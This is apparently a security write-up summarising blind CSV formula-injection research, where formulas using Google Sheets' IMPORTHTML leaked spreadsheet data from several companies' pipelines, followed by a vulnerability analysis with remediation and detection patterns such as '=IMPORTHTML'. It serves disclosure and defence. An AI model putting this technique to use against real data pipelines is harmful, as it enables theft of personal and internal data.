Full Report
Blind XSS is a funny bug. You launch a payload, you walk away and eventually, the exploit is triggered when somebody loads the page. This article describes a similar type of exploit but with using CSVs. CSV's are used everywhere by moderen companies. Spreadsheets viewed in Excel, automation tool downloading, Salesforce reports... lots of places. If we can poison the pipeline of a web page, what if we could do the same for CSV? Depending on the parser, there are some powerful ways to call things in CSV. So, this could be used to perform a multitude of exploits, depending on the system. They decided to target the usage of Google Sheets having CSV imported from it. The function IMPORTHTML is a great target because it makes web requests. By concatenating rows in the sheet to the web request, they would be able to see some of the data in the sheet. The server that received the request also logged the host, path, query, timestamp and user agent. So, where do we send this data to? Initally, they tried sending it to hundreds of support and contact email addresses, technical support channels and other places along these lines. When this didn't work, they tried adding it to web forms. From this, they got some hits after 20 days. The author made an interesting note: all of the callbacks were made not at ingestion but at some other process in the internal pipeline. Whether this was an internal parser for Google Sheets or a real human opening the file, it depended on the user. Exporting CSVs from Salesforce, Zendesk and Hubspot were big. Automation tools like Zapier and Workato would insert data into Google Sheets live, creating a fairly quick turnaround. Who were the victims of this? A large social media platform sent them forwarded emails from a payments-support inbox. A major hotel chain sent membership application details. Even a bug bounty live hacking intake form sent personal details to them. This was reported to all of them. Most of them fixed the issue by performing input validation on the data at the point of ingestion. A unique showcase into what some engineering, creativity and throwing a payload at every possible target can do. Great research!
Analysis Summary
# Vulnerability: Blind CSV Injection (Formula Injection) in Data Pipelines
## CVE Details
- **CVE ID:** N/A (General vulnerability class; specific vendor CVEs were not assigned in the summary)
- **CVSS Score:** Estimated 7.5 - 8.2 (High)
- **CWE:** CWE-1236: Improper Input Validation of Content in CSV File
## Affected Systems
- **Products:** Various CRM and automation platforms including Salesforce, Zendesk, HubSpot, Zapier, and Workato.
- **Versions:** All versions failing to sanitize user-supplied data before CSV export.
- **Configurations:** Systems where user-provided input (from web forms, support emails, or intake forms) is exported to CSV format and subsequently opened in spreadsheet applications like Google Sheets or Excel.
## Vulnerability Description
This is a "Blind" variation of CSV Injection (also known as Formula Injection). The vulnerability occurs when a web application accepts untrusted input and includes it in a CSV file without proper validation. When this CSV is uploaded to or opened by a spreadsheet processor (specifically Google Sheets in this research), the spreadsheet engine interprets cells starting with special characters (e.g., `=`, `+`, `-`, `@`) as executable formulas.
The researchers leveraged Google Sheets' `IMPORTHTML` function. By injecting a formula that concatenates sensitive sheet data into the query string of a web request, attackers can exfiltrate data from the spreadsheet to a remote server under their control.
## Exploitation
- **Status:** PoC available; tested successfully against multiple high-profile targets.
- **Complexity:** Medium (Requires knowledge of spreadsheet functions and internal data pipelines).
- **Attack Vector:** Network (Submitting malicious payloads via web forms, support tickets, or emails).
## Impact
- **Confidentiality:** High (Internal data, payment support logs, and personal details were exfiltrated).
- **Integrity:** Medium (Ability to manipulate data presentation within the spreadsheet).
- **Availability:** Low (Primary impact is data theft, not service disruption).
## Remediation
### Patches
- **Generic Fix:** Organizations reported fixing the issue by implementing strict input validation and sanitization at the point of ingestion.
- **Specific Fix:** Ensure that any field starting with `=`, `+`, `-`, or `@` is prepended with an apostrophe `'` or a space to prevent the spreadsheet software from interpreting the cell as a formula.
### Workarounds
- Disable the execution of external data functions (like `IMPORTHTML` or `DDE`) in spreadsheet software settings.
- Use plain-text viewers to audit CSV data before importing it into analytical tools.
## Detection
- **Indicators of Compromise:** Outbound web requests from Google Sheets' infrastructure to unknown or suspicious domains, especially those containing long, encoded query strings.
- **Detection Methods:** Monitor for "injection signatures" in database entries and exported logs, such as strings starting with `=IMPORTHTML`, `=IMPORTXML`, or `=HYPERLINK`.
## References
- OWASP CSV Injection Guide: hxxps[://]cheatsheetseries[.]owasp[.]org/cheatsheets/CSV_Injection_Cheat_Sheet[.]html
- Google Sheets Function Documentation: hxxps[://]support[.]google[.]com/docs/answer/3093339